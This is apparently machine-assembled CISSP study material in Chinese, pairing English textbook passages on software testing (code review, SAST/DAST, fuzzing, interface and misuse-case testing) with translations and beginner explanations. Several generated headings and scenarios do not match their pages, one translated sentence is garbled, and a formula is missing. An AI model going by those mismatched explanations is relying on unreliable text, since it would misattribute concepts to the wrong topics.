你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

NIST:NIST 提供美国常用安全标准、框架和指南。

PCI DSS:PCI DSS 是支付卡行业数据安全标准。

FedRAMP:FedRAMP 用于美国联邦云服务授权和持续监控。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

信用卡/持卡人数据场景优先想到 PCI DSS。

美国政府云服务、云授权、持续监控常对应 FedRAMP。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
NIST NIST 提供美国常用安全标准、框架和指南。
PCI DSS PCI DSS 是支付卡行业数据安全标准。
FedRAMP FedRAMP 用于美国联邦云服务授权和持续监控。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
学习单元 35 / PDF P1063

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Software is the heart of the modern enterprise and performs businesscritical functions. Software failures can disrupt businesses with very serious consequences. Those are just a few of the many reasons that careful testing of software is essential to the confidentiality, integrity, and availability requirements of every modern organization. Software should be designed in a manner that considers the possible threats to these objectives and responds appropriately. One of the core design principles supporting this goal is that software should never depend on users behaving properly.

Instead, software should expect the unexpected and gracefully handle invalid input, improperly sequenced activity, and other unanticipated situations. This process of handling unexpected activity is known as exception handling. In this section, you'll learn about the many types of software testing that you can integrate into your organization's software development life cycle. This chapter provides coverage of software testing topics.

You'll find deeper coverage of the software development life cycle (SDLC) and software security issues in Chapter 20, “Software Development Security.” Code Review and Testing One of the most critical components of a software testing program is conducting code review and testing. These procedures provide third-party reviews of the work performed by developers before moving code into a production environment. Code reviews and tests may discover security, performance, or reliability flaws in applications before they go live and negatively impact business operations. You will learn more about how code review and testing fits into the software development life cycle in Chapter 20.

Code Review Code review is the foundation of software assessment programs. During a code review, also known as a peer review, developers other than the one who

中文直译 / 整理

软件是现代企业的心脏,执行着关键的业务功能。 软件故障可能导致业 务中断,并带来非常严重的后果。 这些只是众多原因中的一小部分,表明对软件进行细致的测试对于每个现代 组织的机密性、完整性和可用性要求至关重要。 软件的设计应考虑到这些目标可能面临的威胁,并做出适当的响应。 支持这一 目标的核心设计原则之一是,软件绝不应依赖用户行为规范。 相反,软件应预 期意外情况,并能够优雅地处理无效输入、顺序错误的操作以及其他不可预见 的情形。 这种处理意外情况的过程被称为异常处理。 在本节中,您将了解可以集成到您组织软件开发生命周期中的多种软件测试类型。 本章涵盖软件测试主题。 您将在第20章“软件开发安全”中找到关于 软件开发生命周期(SDLC)和软件安全问题的更深入内容。 代码审查与测试 软件测试计划中最关键的组成部分之一是进行代码审查和测试。 这些流程 在将代码移入生产环境之前,提供对开发人员工作的第三方审查。 代码审 查和测试可在应用程序上线并负面影响业务运营之前,发现其中的安全、 性能或可靠性缺陷。 您将了解更多关于代码审查和测试如何融入软件开发生命周期的内容,详见第20 章。 代码审查 代码审查是软件评估计划的基础。

在代码审查过程中,也称为同行评审,除代码 编写者之外的其他开发人员

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

程序:程序是一步一步怎么做。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

Step-by-step、SOP 常对应 procedure。

安全越早进入 SDLC,修复成本越低。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
程序 程序是一步一步怎么做。
软件开发生命周期 SDLC 把需求、设计、开发、测试、部署和维护串起来。
学习单元 36 / PDF P1064

第 1064 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

wrote the code review it for defects. Code reviews may result in approval of an application's move into a production environment, or they may send the code back to the original developer with recommendations for rework of issues detected during the review. Code review takes many different forms and varies in formality from organization to organization. The most formal code review processes, known as Fagan inspections, follow a rigorous review and testing process with six steps: 1. Planning 2. Overview 3. Preparation 4. Inspection 5. Rework 6. Follow-up An overview of the Fagan inspection appears in Figure 15.9.

Each of these steps has well-defined entry and exit criteria that must be met before the process can formally transition from one stage to the next. The Fagan inspection level of formality is normally found only in highly restrictive environments where code flaws may have catastrophic impact.

Most organizations use less rigorous processes, using code peer review measures that include the following: Developers walking through their code in a meeting with one or more other team members A senior developer performing manual code review and signing off on all code before moving the code to production Use of automated review tools to detect common application flaws before moving the code to production

中文直译 / 整理

会审查代码以查找缺陷。 代码审查可能导致应用程序被批准进入生产环境,也 可能将代码退回给原始开发人员,并提供针对审查期间发现的问题进行修改的 建议。 代码审查有多种形式,并且在不同组织中的正式程度各不相同。 最正式的代码 审查流程称为法根检查,遵循一个包含六个步骤的严格审查和测试流程: 1. 计划 2. 概述 3. 准备 4. 检查 5. 修复 6. 跟进 Fagan 检查的概述见图 15.9。 每个步骤都有明确的进入和退出标准,必须 在流程正式从一个阶段过渡到下一个阶段之前满足这些标准。 Fagan 检查的正式程度通常仅存在于代码缺陷可能造成灾难性影响的严格 环境中。 大多数组织使用较不严格的过程,采用包括以下内容的代码同行 评审措施: Develo pers walkin g 通过他们在与一个或多个的代码会议中 其他团队成员 高级开发人员执行手动代码审查,并在将代码移至生产环境前签署确认所有代 码 使用自动化审查工具在将代码移至生产环境前检测常见的应用程序缺陷

小白解释

场景先行:你是公司的安全负责人,正在读第 1064 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1064 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
学习单元 37 / PDF P1065

第 1065 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 15.9 Fagan inspections follow a rigid formal process, with defined entry and exit criteria that must be met before transitioning between stages. Each organization should adopt a code review process that suits its business requirements and software development culture. Static Testing Static application security testing (SAST) evaluates the security of software without running it by analyzing either the source code or the compiled application. Static analysis usually involves the use of automated tools designed to detect common software flaws, such as buffer overflows. In mature development environments, application developers are given access

中文直译 / 整理

图 15.9 Fagan 检查遵循严格的正式流程,必须在各阶段之间过渡前满足定义的进 入和退出标准。 每个组织都应采用符合其业务需求和软件开发文化的代码审查流程。 静态测试 静态应用安全测试(SAST)通过分析源代码或编译后的应用程序,在不运行 软件的情况下评估其安全性。 静态分析通常涉及使用自动化工具来检测常见 的软件缺陷,例如缓冲区溢出。 在成熟的开发环境中,应用程序开发人员可 以访问

小白解释

场景先行:你是公司的安全负责人,正在读第 1065 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1065 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
学习单元 38 / PDF P1066

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

to static analysis tools and use them throughout the design, build, and test process. Dynamic Testing Dynamic application security testing (DAST) evaluates the security of software in a runtime environment and is often the only option for organizations deploying applications written by someone else. In those cases, testers often do not have access to the underlying source code. One common example of dynamic software testing is the use of web application scanning tools to detect the presence of cross-site scripting, SQL injection, or other flaws in web applications. Dynamic tests on a production environment should always be carefully coordinated to avoid an unintended interruption of service.

Dynamic testing may include the use of synthetic transactions and benchmarks to verify system performance. Synthetic transactions are scripted transactions with known expected results. The testers run the synthetic transactions against the tested code and then compare the output of the transactions to the expected state. Any deviations between the actual and expected results represent possible flaws in the code and must be further investigated. Benchmarks are predefined standards or baseline values against which the performance, efficiency, or effectiveness of a system is measured. They provide a set of criteria that a system should meet or exceed to be considered adequately performing.

Benchmarks often involve specific performance metrics such as response time, throughput, error rates, and resource utilization, among others. These metrics are used to evaluate the system's behavior under normal conditions or stress, such as high traffic or data volume. By comparing the system's performance with these benchmarks, testers can determine whether the system is performing within acceptable parameters or if there are performance issues that need to be addressed.

中文直译 / 整理

静态分析工具,并在设计、构建和测试过程中使用它们。 动态测试 动态应用程序安全测试(DAST) 在运行时环境中评估软件的安全性,对于部 署由他人编写的应用程序的组织而言,这通常是唯一的选择。 在这些情况下, 测试人员通常无法访问底层源代码。 动态软件测试的一个常见示例是使用 Web 应用程序扫描工具来检测 Web 应用程序中是否存在跨站脚本、SQL 注入 或其他漏洞。 对生产环境进行动态测试时,必须谨慎协调,以避免意外中断服 务。 动态测试可能包括使用 合成事务 和 基准测试 来验证系统性能。 合成事务是具 有已知预期结果的脚本化事务。 测试人员将合成事务应用于被测代码,然后将 事务的输出与预期状态进行比较。 实际结果与预期结果之间的任何偏差都可能 代表代码中的缺陷,必须进一步调查。 基准是预定义的标准或基线值,用于衡量系统的性能、效率或有效性。 它们提 供了一组标准,系统必须满足或超越这些标准才能被视为表现良好。 基准通常 涉及特定的性能指标,例如响应时间、吞吐量、错误率和资源利用率等。 这些 指标用于评估系统在正常条件或压力(如高流量或大数据量)下的行为。

通过 将系统的性能与这些基准进行比较,测试人员可以确定系统是否在可接受的参 数范围内运行,或者是否存在需要解决的性能问题。

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

注入攻击:注入攻击把恶意输入当命令或查询执行。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 39 / PDF P1067

第 1067 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Two terms you might encounter when dealing with code review and testing are IAST and RASP. Interactive application security testing (IAST) performs real-time analysis of runtime behavior, application performance, HTTP/HTTPS traffic, frameworks, components, and backend connections. Runtime Application Self-Protection (RASP) is a tool that runs on a server and intercepts calls to and from an application and validates data requests. Ethical Disclosure While conducting security testing, cybersecurity professionals may discover previously unknown vulnerabilities in products or systems operated by other vendors.

They may implement compensating controls to correct these situations but find themselves unable to correct the underlying issue because it resides in code outside of their control. The security community embraces the concept of ethical disclosure. This principle says that security professionals who detect a vulnerability have a responsibility to report that vulnerability to the vendor, providing them with an opportunity to develop a patch or other remediation to protect their customers. This disclosure should first be made privately to the vendor, allowing them to correct the problem before it becomes public knowledge.

However, the ethical disclosure principle also suggests that those reporting a vulnerability should provide the vendor with a reasonable amount of time to correct the vulnerability and, if it is not corrected, then publicly disclose the vulnerability so that other security professionals may make informed decisions about their future use of the product. Fuzz Testing Fuzz testing is a specialized dynamic testing technique that provides many different types of input to software to stress its limits and find previously undetected flaws. Fuzz testing software supplies invalid input to the software, either randomly generated or specially crafted to trigger known software vulnerabilities.

The fuzz tester then monitors the performance of the

中文直译 / 整理

在处理代码审查和测试时,你可能会遇到两个术语:IAST 和 RASP。 交 互式应用程序安全测试(IAST)对运行时行为、应用程序性能、 HTTP/HTTPS 流量、框架、组件和后端连接进行实时分析。 运行时应用程 序自我保护(RASP)是一种在服务器上运行的工具,用于拦截对应用程序的 调用以及应用程序的响应,并验证数据请求。 道德披露 在进行安全测试时,网络安全专业人员可能会发现由其他厂商运营的产品 或系统中先前未知的漏洞。 他们可能会实施补偿性控制措施来纠正这些情 况,但由于问题位于其无法控制的代码中,因此无法解决根本问题。 安全社区倡导道德披露这一理念。 该原则指出,发现漏洞的安全专业人员 有责任向厂商报告该漏洞,使其有机会开发补丁或其他修复措施以保护其 客户。 此披露应首先私下向厂商进行,使其在问题公开之前得以修正。 然而,道 德披露原则也建议,报告漏洞者应给予厂商合理的时间来修复该漏洞; 如 果未得到修复,则应公开披露该漏洞,以便其他安全专业人员能够基于此 信息做出关于未来是否使用该产品的明智决策。

模糊测试 模糊测试是一种专门的动态测试技术,通过向软件提供多种不同类型的输入来 压力测试其极限并发现之前未检测到的缺陷。 模糊测试软件会向软件提供无效 输入,这些输入要么是随机生成的,要么是专门设计用来触发已知软件漏洞的。 然后,模糊测试器会监控软件的

小白解释

场景先行:你是公司的安全负责人,正在读第 1067 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1067 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 40 / PDF P1068

第 1068 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

application, watching for software crashes, buffer overflows, or other undesirable and/or unpredictable outcomes. There are two main categories of fuzz testing: Mutation (Dumb) Fuzzing Takes previous input values from actual operation of the software and manipulates (or mutates) it to create fuzzed input. It might alter the characters of the content, append strings to the end of the content, or perform other data manipulation techniques. Generational (Intelligent) Fuzzing Develops data models and creates new fuzzed input based on an understanding of the types of data used by the program.

The zzuf tool automates the process of mutation fuzzing by manipulating input according to user specifications. For example, Figure 15.10 shows a file containing a series of 1s. FIGURE 15.10 Prefuzzing input file containing a series of 1s Figure 15.11 shows the zzuf tool applied to that input. The resulting fuzzed text is almost identical to the original text. It still contains mostly 1s, but it now has several changes made to the text that might confuse a program

中文直译 / 整理

应用程序,观察是否出现软件崩溃、缓冲区溢出或其他不良和/或不可预测 的结果。 模糊测试主要有两类: 变异(笨拙)模糊测试 采用软件实际运行中的先前输入值,并对其进行操纵 (或变异)以生成模糊输入。 它可能更改内容的字符、在内容末尾附加字符串, 或执行其他数据操纵技术。 生成式(智能)模糊测试 基于对程序所使用数据类型的理解,构建数据模型并 创建新的模糊输入。 zzuf 工具通过根据用户指定的方式操纵输入来自动化变异模糊测试过程。 例 如,图 15.10显示了一个包含一系列 1 的文件。 图 15.10包含一系列 1 的预模糊输入文件 图 15.11展示了 zzuf 工具应用于该输入的情况。 生成的模糊文本几乎与原始文 本相同,它仍然主要包含 1,但现在对文本进行了若干更改,可能会使程序混淆

小白解释

场景先行:你是公司的安全负责人,正在读第 1068 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1068 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 41 / PDF P1069

第 1069 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

expecting the original input. This process of slightly manipulating the input is known as bit flipping. FIGURE 15.11 The input file from Figure 15.10 after being run through the zzuf mutation fuzzing tool Fuzz testing is an important tool, but it does have limitations. Fuzz testing typically doesn't result in full coverage of the code and is commonly limited to detecting simple vulnerabilities that do not require complex manipulation of business logic. For this reason, fuzz testing should be considered only one tool in a suite of tests performed, and it is useful to conduct test coverage analysis (discussed later in this chapter) to determine the full scope of the test.

Interface Testing Interface testing is an important part of the development of complex software systems. In many cases, multiple teams of developers work on different parts of a complex application that must function together to meet business objectives. The handoffs between these separately developed modules use well-defined interfaces so that the teams may work independently. Interface

中文直译 / 整理

期望原始输入。 这种轻微操纵输入的过程被称为 位翻转。 图 15.11 输入文件来自 图 15.10 经过 zzuf 变异模糊测试工具处理后 模糊测试是一种重要的工具,但它确实存在局限性。 模糊测试通常无法实现代 码的完全覆盖,且通常仅限于检测不需要复杂业务逻辑操作的简单漏洞。 因此, 模糊测试应仅被视为一系列测试工具中的一种,并且有必要进行测试覆盖率分 析(本章后续将讨论),以确定测试的完整范围。 接口测试 接口测试是复杂软件系统开发中的重要部分。 在许多情况下,多个开发团队分 别负责复杂应用程序的不同部分,这些部分必须协同工作以实现业务目标。 这 些独立开发的模块之间的交接通过定义良好的接口进行,以便团队可以独立工 作。 接口

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1069 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 42 / PDF P1070

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

testing assesses the performance of modules against the interface specifications to ensure that they will work together properly when all the development efforts are complete. Four types of interfaces should be tested during the software testing process: Application Programming Interfaces (APIs) Offer a standardized way for code modules to interact and may be exposed to the outside world through web services. Developers must test APIs to ensure that they enforce all security requirements. User Interfaces (UIs) Examples include graphical user interfaces (GUIs) and command-line interfaces. UIs provide end users with the ability to interact with the software.

Interface tests should include reviews of all user interfaces to verify that they function properly. Network Interfaces Serve as crucial communication gateways that allow different systems to connect and interact over various types of networks, such as local area networks (LANs), wide area networks (WANs), or the Internet. These interfaces handle the data exchange between systems, and their functionality is paramount in ensuring that data is transmitted accurately, securely, and efficiently.

Testing of network interfaces should include validating the robustness of the connection, data transmission speed, security protocols used for data encryption, authentication processes, and error handling mechanisms. This testing is essential, especially in distributed applications, to ensure data integrity, confidentiality, and system interoperability across different network environments. Physical Interfaces Exist in some applications that manipulate machinery, logic controllers, or other objects in the physical world. Software testers should pay careful attention to physical interfaces because of the potential consequences if they fail.

Interfaces provide important mechanisms for the planned or future interconnection of complex systems. The modern digital world depends on the availability of these interfaces to facilitate interactions between disparate software packages. However, developers must be careful that the flexibility provided by interfaces does not introduce additional security risk. Interface testing provides an added degree of assurance that interfaces meet the organization's security requirements. Misuse Case Testing

中文直译 / 整理

测试评估模块是否符合接口规范,以确保在所有开发工作完成后,它们能 够正确协同工作。 在软件测试过程中应测试四种类型的接口: 应用程序编程接口(APIs)为代码模块之间的交互提供标准化方式,并可能通 过网络服务向外部暴露。 开发人员必须测试API,以确保其满足所有安全要求。 用户界面(UIs)示例包括图形用户界面(GUIs)和命令行界面。 UIs为最终用 户提供与软件交互的能力。 接口测试应包括对所有用户界面的审查,以验证其正 常运行。 网络接口作为关键的通信网关,使不同系统能够通过各种类型的网络(如局域网 (LANs)、广域网(WANs)或互联网)连接和交互。 这些接口负责系统之间 的数据交换,其功能对于确保数据准确、安全和高效传输至关重要。 网络接口的 测试应包括验证连接的健壮性、数据传输速度、用于数据加密的安全协议、身份 验证过程以及错误处理机制。 这种测试至关重要,特别是在分布式应用程序中, 以确保在不同网络环境中数据的完整性、机密性和系统互操作性。 物理接口 存在于某些操作机械、逻辑控制器或其他物理世界对象的应用程序中。 软件测试人员应密切关注物理接口,因为它们一旦失败可能会带来严重后果。

接口为复杂系统的计划或未来互联提供了重要机制。 现代数字世界依赖于这些 接口的可用性,以促进不同软件包之间的交互。 然而,开发人员必须谨慎,确 保接口提供的灵活性不会引入额外的安全风险。 接口测试提供了额外的保障, 确保接口符合组织的安全要求。 误用案例测试

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

认证:认证是验证“你是不是你声称的那个人”。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
学习单元 43 / PDF P1071

第 1071 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

In some applications, there are clear examples of ways that software users might attempt to misuse the application. For example, users of banking software might try to manipulate input strings to gain access to another user's account. They might also try to withdraw funds from an account that is already overdrawn. Software testers use a process known as misuse case testing or abuse case testing to evaluate the vulnerability of their software to these known risks. In misuse case testing, testers first enumerate the known misuse cases. They then attempt to exploit those misuse cases with manual and/or automated attack techniques.

Test Coverage Analysis Testing is an important part of any software development process, but it is unfortunately impossible to completely test any piece of software. There are simply too many ways that software might malfunction or undergo attack. Software testing professionals often conduct a test coverage analysis to estimate the degree of testing conducted against the new software. The test coverage is computed using the following formula: Of course, this is a highly subjective calculation. Accurately computing test coverage requires enumerating the possible use cases, which is an exceptionally difficult task.

Therefore, anyone using test coverage calculations should take care to understand the process used to develop the input values when interpreting the results. The test coverage analysis formula may be adapted to use many different criteria. Here are five common criteria: Branch coverage: Has every if statement been executed under all if and else conditions? Condition coverage: Has every logical test in the code been executed under all sets of inputs? Function coverage: Has every function in the code been called and returned results? Loop coverage: Has every loop in the code been executed under conditions that cause code execution multiple times, only once, and not

中文直译 / 整理

